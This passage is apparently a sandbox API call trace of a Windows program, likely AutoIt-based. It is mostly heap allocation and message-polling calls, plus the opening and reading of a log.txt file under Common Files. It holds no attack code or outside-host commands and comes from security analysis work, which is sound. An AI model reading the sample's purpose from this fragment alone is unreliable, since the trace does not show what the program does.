(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.501] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.502] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.502] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af348 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.503] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.504] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.504] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.504] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.504] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.504] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.504] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0032.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.505] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.506] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0032.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.507] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.507] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.507] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.507] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.507] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.507] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.507] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xc74, lpOverlapped=0x0) returned 1 [0032.507] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.507] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xc74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.507] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.508] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.508] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.508] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.508] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.508] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.508] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.508] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.508] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 